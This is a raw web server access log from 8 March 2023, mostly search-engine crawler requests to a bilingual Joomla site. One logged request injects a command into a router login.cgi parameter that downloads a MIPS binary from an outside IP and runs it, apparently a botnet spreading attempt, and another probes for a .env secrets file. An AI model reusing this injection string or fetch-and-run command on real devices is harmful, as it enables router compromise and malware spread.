185.191.171.6 - - [08/Mar/2023:12:27:13 +0100] "GET /index.php?Itemid=45&catid=7&id=18&lang=en&option=com_content&view=article HTTP/1.1" 302 559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:12:27:15 +0100] "-" 408 1489 "-" "-"
185.191.171.10 - - [08/Mar/2023:12:27:18 +0100] "GET /index.php?Itemid=11&catid=7&id=49&lang=fr&option=com_content&view=article HTTP/1.1" 302 559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.7 - - [08/Mar/2023:12:28:01 +0100] "GET /index.php?Itemid=5&catid=7&id=44&lang=en&option=com_content&view=article HTTP/1.1" 302 557 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.36 - - [08/Mar/2023:12:28:29 +0100] "GET /?Itemid=50&catid=7&fontstyle=f-smaller&id=31&lang=en&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.7 - - [08/Mar/2023:12:29:12 +0100] "GET /?Itemid=53&catid=1&fontstyle=f-larger&id=480&lang=en&option=com_content&view=article HTTP/1.1" 302 578 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.23 - - [08/Mar/2023:12:29:16 +0100] "GET /index.php?Itemid=16&catid=7&id=63&lang=fr&option=com_content&view=article HTTP/1.1" 302 559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.38 - - [08/Mar/2023:12:29:28 +0100] "GET /?Itemid=12&catid=7&fontstyle=f-larger&id=56&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:12:29:30 +0100] "-" 408 1489 "-" "-"
114.255.222.104 - - [08/Mar/2023:12:30:07 +0100] "GET /" 400 458 "-" "-"
185.191.171.37 - - [08/Mar/2023:12:30:11 +0100] "GET /?Itemid=14&catid=7&fontstyle=f-smaller&id=56&lang=en&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.10 - - [08/Mar/2023:12:30:22 +0100] "GET /index.php?Itemid=53&catid=1&id=413%3F%3Dfr&lang=fr&option=com_content&view=article HTTP/1.1" 302 574 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.33 - - [08/Mar/2023:12:30:31 +0100] "GET /?Itemid&fontstyle=f-larger&lang=en&option=com_xmap&sitemap=1 HTTP/1.1" 302 536 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:12:30:34 +0100] "-" 408 1489 "-" "-"
185.191.171.21 - - [08/Mar/2023:12:31:05 +0100] "GET /index.php?Itemid=47&catid=7&id=31&lang=fr&option=com_content&view=article HTTP/1.1" 302 559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.42 - - [08/Mar/2023:12:31:07 +0100] "GET /?Itemid=0&fontstyle=f-larger&id=318&lang=fr&option=com_content&view=article HTTP/1.1" 302 562 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.38 - - [08/Mar/2023:12:31:09 +0100] "GET /index.php?Itemid=0&id=269&lang=fr&option=com_content&view=article HTTP/1.1" 302 546 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.38 - - [08/Mar/2023:12:31:23 +0100] "GET /?Itemid&fontstyle=f-larger&lang=fr&option=com_acymailing HTTP/1.1" 302 527 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.15 - - [08/Mar/2023:12:31:53 +0100] "GET /?Itemid=49&catid=7&fontstyle=f-larger&id=55&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:12:32:08 +0100] "-" 408 1489 "-" "-"
185.191.171.1 - - [08/Mar/2023:12:33:25 +0100] "GET /index.php?Itemid=50&catid=7&id=29&lang=en&option=com_content&view=article HTTP/1.1" 302 558 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.3 - - [08/Mar/2023:12:33:27 +0100] "GET /?Itemid=0&fontstyle=f-smaller&id=312&lang=fr&option=com_content&view=article HTTP/1.1" 302 562 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.19 - - [08/Mar/2023:12:34:14 +0100] "GET /index.php?id=350&lang=fr&option=com_content&view=article HTTP/1.1" 302 530 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:12:34:23 +0100] "-" 408 1489 "-" "-"
185.191.171.17 - - [08/Mar/2023:12:34:49 +0100] "GET /index.php?Itemid=14&catid=7&id=32&lang=en&option=com_content&view=article HTTP/1.1" 302 558 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.44 - - [08/Mar/2023:12:34:51 +0100] "GET /index.php?Itemid&id=285&lang=en&option=com_content&view=article HTTP/1.1" 302 542 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.9 - - [08/Mar/2023:12:34:54 +0100] "GET /?Itemid=3&catid=1&fontstyle=f-larger&id=486&lang=fr&option=com_content&view=article HTTP/1.1" 302 577 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:12:35:00 +0100] "-" 408 1489 "-" "-"
185.191.171.13 - - [08/Mar/2023:12:35:19 +0100] "GET /?Itemid=3&catid=7&fontstyle=f-smaller&id=11%E2%8C%A9%3Dfr&lang=en&option=com_content&view=article HTTP/1.1" 302 602 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.44 - - [08/Mar/2023:12:35:43 +0100] "GET /?Itemid&fontstyle=f-larger&id=354&lang=fr&option=com_content&view=article HTTP/1.1" 302 560 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.1 - - [08/Mar/2023:12:36:00 +0100] "GET /index.php?catid=7&id=55&lang=en&option=com_content&view=article HTTP/1.1" 302 542 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:12:37:02 +0100] "-" 408 1489 "-" "-"
185.191.171.15 - - [08/Mar/2023:12:38:07 +0100] "GET /index.php?Itemid=50&catid=7&id=28&lang=en&option=com_content&view=article HTTP/1.1" 302 558 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.45 - - [08/Mar/2023:12:38:11 +0100] "GET /?Itemid=45&catid=7&fontstyle=f-smaller&id=26&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.33 - - [08/Mar/2023:12:38:20 +0100] "GET /?Itemid=50&catid=7&fontstyle=f-larger&id=26&lang=fr&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.3 - - [08/Mar/2023:12:38:44 +0100] "GET /?Itemid=3&catid=1&fontstyle=f-larger&id=412&lang=en&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.17 - - [08/Mar/2023:12:39:12 +0100] "GET /?Itemid&fontstyle=f-smaller&lang=fr&option=com_xmap&sitemap=1 HTTP/1.1" 302 538 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:12:39:17 +0100] "-" 408 1489 "-" "-"
185.191.171.23 - - [08/Mar/2023:12:39:26 +0100] "GET /?Itemid=3&fontstyle=f-smaller&id=284&lang=en&option=com_content&view=article HTTP/1.1" 302 564 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:12:39:27 +0100] "-" 408 1489 "-" "-"
185.191.171.36 - - [08/Mar/2023:12:39:30 +0100] "GET /?Itemid=0&catid=7&fontstyle=f-larger&id=21&lang=fr&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.19 - - [08/Mar/2023:12:39:38 +0100] "GET /?Itemid=3&catid=7&fontstyle=f-smaller&id=20&lang=en&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.17 - - [08/Mar/2023:12:41:06 +0100] "GET /index.php?Itemid=0&id=193&lang=en&option=com_content&view=article HTTP/1.1" 302 544 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.10 - - [08/Mar/2023:12:41:55 +0100] "GET /?Itemid=46&catid=7&fontstyle=f-smaller&id=5&lang=fr&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:12:41:56 +0100] "-" 408 1489 "-" "-"
185.191.171.15 - - [08/Mar/2023:12:41:56 +0100] "GET /index.php?Itemid=50&catid=7&id=65&lang=fr&option=com_content&view=article HTTP/1.1" 302 559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.6 - - [08/Mar/2023:12:42:14 +0100] "GET /index.php?Itemid=11&catid=7&id=50&lang=en&option=com_content&view=article HTTP/1.1" 302 558 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.5 - - [08/Mar/2023:12:42:52 +0100] "GET /index.php?Itemid=0&id=211&lang=en&option=com_content&view=article HTTP/1.1" 302 543 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.5 - - [08/Mar/2023:12:43:10 +0100] "GET /index.php?Itemid&fontstyle=f-smaller&lang=fr&option=com_xmap&sitemap=1 HTTP/1.1" 302 552 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
36.141.89.214 - - [08/Mar/2023:12:43:42 +0100] "GET /" 400 458 "-" "-"
212.129.37.175 - - [08/Mar/2023:12:43:53 +0100] "-" 408 1489 "-" "-"
212.129.37.175 - - [08/Mar/2023:12:44:10 +0100] "-" 408 1489 "-" "-"
185.191.171.3 - - [08/Mar/2023:12:44:20 +0100] "GET /index.php?Itemid=3&id=312&lang=en&option=com_content&view=article HTTP/1.1" 302 543 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
111.118.40.97 - - [08/Mar/2023:12:44:58 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 402 "-" "Hakai/2.0"
146.70.11.40 - - [08/Mar/2023:12:45:04 +0100] "GET /.env HTTP/1.1" 302 467 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.191.171.3 - - [08/Mar/2023:12:45:24 +0100] "GET /index.php?id=316&lang=fr&option=com_content&view=article HTTP/1.1" 302 530 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.17 - - [08/Mar/2023:12:45:40 +0100] "GET /index.php?Itemid&catid=7&id=37&lang=fr&option=com_content&view=article HTTP/1.1" 302 553 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:12:46:49 +0100] "-" 408 1489 "-" "-"
185.191.171.43 - - [08/Mar/2023:12:46:57 +0100] "GET /index.php?Itemid=11&catid=7&id=44&lang=en&option=com_content&view=article HTTP/1.1" 302 558 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
114.119.150.120 - - [08/Mar/2023:12:47:00 +0100] "GET /robots.txt HTTP/1.1" 302 478 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
185.191.171.3 - - [08/Mar/2023:12:47:08 +0100] "GET /?Itemid=48&catid=7&fontstyle=f-smaller&id=35&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.23 - - [08/Mar/2023:12:47:55 +0100] "GET /?Itemid=3&catid=7&fontstyle=f-smaller&id=57&lang=en&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:12:48:20 +0100] "-" 408 1489 "-" "-"
185.191.171.43 - - [08/Mar/2023:12:48:47 +0100] "GET /?fontstyle=f-larger&id=310&lang=fr&option=com_content&view=article HTTP/1.1" 302 547 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.9 - - [08/Mar/2023:12:48:51 +0100] "GET /index.php?gtask=archive&lang=fr&listid=1%3Amailing_list&option=com_acymailing HTTP/1.1" 302 561 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.35 - - [08/Mar/2023:12:48:55 +0100] "GET /?Itemid=16&catid=7&fontstyle=f-larger&id=49&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:12:49:03 +0100] "-" 408 1489 "-" "-"
185.191.171.21 - - [08/Mar/2023:12:49:29 +0100] "GET /?fontstyle=f-larger&lang=en&option=com_content&view=frontpage HTTP/1.1" 302 537 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.1 - - [08/Mar/2023:12:50:13 +0100] "GET /index.php?Itemid=0&id=153&lang=fr&option=com_content&view=article HTTP/1.1" 302 545 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.37 - - [08/Mar/2023:12:50:17 +0100] "GET /index.php?Itemid=3&id=324&lang=en&option=com_content&view=article HTTP/1.1" 302 543 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.1 - - [08/Mar/2023:12:50:26 +0100] "GET /?Itemid&fontstyle=f-smaller&id=261&lang=en&option=com_content&view=article HTTP/1.1" 302 561 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.37 - - [08/Mar/2023:12:50:46 +0100] "GET /?Itemid=0&fontstyle=f-smaller&id=318&lang=fr&option=com_content&view=article HTTP/1.1" 302 563 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.43 - - [08/Mar/2023:12:51:13 +0100] "GET /index.php?Itemid=53&catid=1&id=417&lang=fr&option=com_content&view=article HTTP/1.1" 302 561 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.39 - - [08/Mar/2023:12:51:21 +0100] "GET /index.php?catid=8&id=115&lang=fr&option=com_content&view=article HTTP/1.1" 302 544 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:12:51:43 +0100] "-" 408 1489 "-" "-"
185.191.171.3 - - [08/Mar/2023:12:51:47 +0100] "GET /?Itemid=45&catid=7&fontstyle=f-smaller&id=53&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.7 - - [08/Mar/2023:12:51:55 +0100] "GET /?Itemid=11&catid=7&fontstyle=f-larger&id=50&lang=fr&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.45 - - [08/Mar/2023:12:52:33 +0100] "GET /index.php?Itemid=14&catid=7&id=23&lang=fr&option=com_content&view=article HTTP/1.1" 302 559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.5 - - [08/Mar/2023:12:52:36 +0100] "GET /index.php?Itemid=3&catid=1&id=415%3F%3Dfr&lang=en&option=com_content&view=article HTTP/1.1" 302 573 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.41 - - [08/Mar/2023:12:52:41 +0100] "GET /index.php?Itemid=0&id=304&lang=fr&option=com_content&view=article HTTP/1.1" 302 545 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.4 - - [08/Mar/2023:12:52:43 +0100] "GET /index.php?Itemid=0&id=161&lang=en&option=com_content&view=article HTTP/1.1" 302 545 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:12:52:46 +0100] "-" 408 1489 "-" "-"
185.191.171.10 - - [08/Mar/2023:12:52:59 +0100] "GET /index.php?Itemid=0&catid=8&id=115&lang=fr&option=com_content&view=article HTTP/1.1" 302 559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.39 - - [08/Mar/2023:12:53:08 +0100] "GET /index.php?Itemid=53&id=301&lang=en&option=com_content&view=article HTTP/1.1" 302 547 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:12:53:58 +0100] "-" 408 1489 "-" "-"
185.191.171.3 - - [08/Mar/2023:12:54:11 +0100] "GET /?Itemid=0&catid=8&fontstyle=f-larger&id=135&lang=fr&option=com_content&view=article HTTP/1.1" 302 577 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.9 - - [08/Mar/2023:12:54:59 +0100] "GET /?Itemid=12&catid=7&fontstyle=f-smaller&id=465&lang=fr&option=com_content&view=article HTTP/1.1" 302 578 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.36 - - [08/Mar/2023:12:55:29 +0100] "GET /?Itemid&fontstyle=f-smaller&id=366&lang=en&option=com_content&view=article HTTP/1.1" 302 561 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.19 - - [08/Mar/2023:12:55:47 +0100] "GET /index.php?Itemid=53&id=328&lang=fr&option=com_content&view=article HTTP/1.1" 302 548 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.36 - - [08/Mar/2023:12:55:54 +0100] "GET /index.php?Itemid=0&id=351&lang=en&option=com_content&view=article HTTP/1.1" 302 545 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:12:56:36 +0100] "-" 408 1489 "-" "-"
185.191.171.8 - - [08/Mar/2023:12:56:58 +0100] "GET /?Itemid=5&catid=7&fontstyle=f-smaller&id=29&lang=fr&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.43 - - [08/Mar/2023:12:57:04 +0100] "GET /index.php?Itemid=45&catid=7&id=5&lang=fr&option=com_content&view=article HTTP/1.1" 302 555 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:12:57:13 +0100] "-" 408 1489 "-" "-"
185.191.171.35 - - [08/Mar/2023:12:57:38 +0100] "GET /index.php?Itemid=0&id=491&lang=fr&option=com_content&view=article HTTP/1.1" 302 545 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.35 - - [08/Mar/2023:12:58:03 +0100] "GET /index.php?Itemid=0&fontstyle=f-smaller>ask=archive&lang=en&listid=1%3Amailing_list&option=com_acymailing HTTP/1.1" 302 611 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.18 - - [08/Mar/2023:12:58:11 +0100] "GET /?Itemid=5&catid=7&fontstyle=f-smaller&id=45&lang=fr&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.25 - - [08/Mar/2023:12:58:25 +0100] "GET /index.php?Itemid=12&catid=7&id=73&lang=fr&option=com_content&view=article HTTP/1.1" 302 558 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.36 - - [08/Mar/2023:12:58:30 +0100] "GET /index.php?Itemid=53&catid=7&id=28&lang=fr&option=com_content&view=article HTTP/1.1" 302 559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.9 - - [08/Mar/2023:12:58:41 +0100] "GET /?Itemid=53&fontstyle=f-larger&id=358&lang=en&option=com_content&view=article HTTP/1.1" 302 565 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
2.183.93.232 - - [08/Mar/2023:12:58:44 +0100] "GET / HTTP/1.1" 302 402 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.191.171.26 - - [08/Mar/2023:12:58:51 +0100] "GET /?Itemid=47&catid=7&fontstyle=f-smaller&id=63&lang=fr&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:12:58:51 +0100] "-" 408 1489 "-" "-"
185.191.171.15 - - [08/Mar/2023:12:59:13 +0100] "GET /index.php?Itemid=0&id=183&lang=fr&option=com_content&view=article HTTP/1.1" 302 545 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.19 - - [08/Mar/2023:12:59:39 +0100] "GET /?Itemid=11&catid=7&fontstyle=f-larger&id=45&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.38 - - [08/Mar/2023:12:59:44 +0100] "GET /?Itemid=46&catid=7&fontstyle=f-smaller&id=62&lang=en&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.18 - - [08/Mar/2023:13:00:03 +0100] "GET /?Itemid=11&catid=7&fontstyle=f-smaller&id=49&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.38 - - [08/Mar/2023:13:00:43 +0100] "GET /?Itemid=5&catid=7&fontstyle=f-larger&id=22&lang=fr&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.14 - - [08/Mar/2023:13:00:44 +0100] "GET /?Itemid&catid=7&fontstyle=f-larger&id=59&lang=en&option=com_content&view=article HTTP/1.1" 302 571 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.11 - - [08/Mar/2023:13:00:54 +0100] "GET /index.php?Itemid=53&catid=1&id=449%E2%8C%A9%3Dfr&lang=fr&option=com_content&view=article HTTP/1.1" 302 586 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.10 - - [08/Mar/2023:13:01:05 +0100] "GET /?Itemid&fontstyle=f-larger&id=351&lang=en&option=com_content&view=article HTTP/1.1" 302 559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.38 - - [08/Mar/2023:13:01:08 +0100] "GET /index.php?Itemid=12&catid=7&id=27&lang=en&option=com_content&view=article HTTP/1.1" 302 557 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.40 - - [08/Mar/2023:13:01:11 +0100] "GET /index.php?Itemid=5&catid=7&id=21&lang=fr&option=com_content&view=article HTTP/1.1" 302 557 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.13 - - [08/Mar/2023:13:01:22 +0100] "GET /index.php?catid=7&id=62&lang=fr&option=com_content&view=article HTTP/1.1" 302 542 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:13:01:29 +0100] "-" 408 1489 "-" "-"
185.191.171.16 - - [08/Mar/2023:13:01:37 +0100] "GET /?Itemid=0&catid=7&fontstyle=f-smaller&id=20&lang=fr&option=com_content&view=article HTTP/1.1" 302 573 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:13:01:39 +0100] "-" 408 1489 "-" "-"
185.191.171.11 - - [08/Mar/2023:13:01:42 +0100] "GET /index.php?Itemid=47&catid=7&id=38&lang=en&option=com_content&view=article HTTP/1.1" 302 558 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
103.203.57.1 - - [08/Mar/2023:13:01:53 +0100] "GET / HTTP/1.1" 302 421 "-" "HTTP Banner Detection (https://security.ipip.net)"
185.191.171.22 - - [08/Mar/2023:13:02:16 +0100] "GET /?Itemid=50&catid=7&fontstyle=f-smaller&id=34&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.19 - - [08/Mar/2023:13:02:22 +0100] "GET /?Itemid=0&fontstyle=f-smaller&id=203&lang=en&option=com_content&view=article HTTP/1.1" 302 562 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.6 - - [08/Mar/2023:13:02:22 +0100] "GET /index.php?Itemid=53&catid=7&id=59&lang=en&option=com_content&view=article HTTP/1.1" 302 556 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.15 - - [08/Mar/2023:13:02:34 +0100] "GET /?Itemid=53&catid=1&fontstyle=f-larger&id=415&lang=fr&option=com_content&view=article HTTP/1.1" 302 578 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.38 - - [08/Mar/2023:13:03:05 +0100] "GET /index.php?Itemid&id=326&lang=en&option=com_content&view=article HTTP/1.1" 302 542 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.15 - - [08/Mar/2023:13:03:39 +0100] "GET /?Itemid&fontstyle=f-larger&id=245&lang=en&option=com_content&view=article HTTP/1.1" 302 559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:13:03:45 +0100] "-" 408 1489 "-" "-"
185.191.171.9 - - [08/Mar/2023:13:03:55 +0100] "GET /index.php?Itemid&id=313&lang=en&option=com_content&view=article HTTP/1.1" 302 541 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.3 - - [08/Mar/2023:13:04:08 +0100] "GET /index.php?Itemid=16&catid=7&id=22&lang=fr&option=com_content&view=article HTTP/1.1" 302 559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.23 - - [08/Mar/2023:13:04:12 +0100] "GET /robots.txt HTTP/1.1" 302 441 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
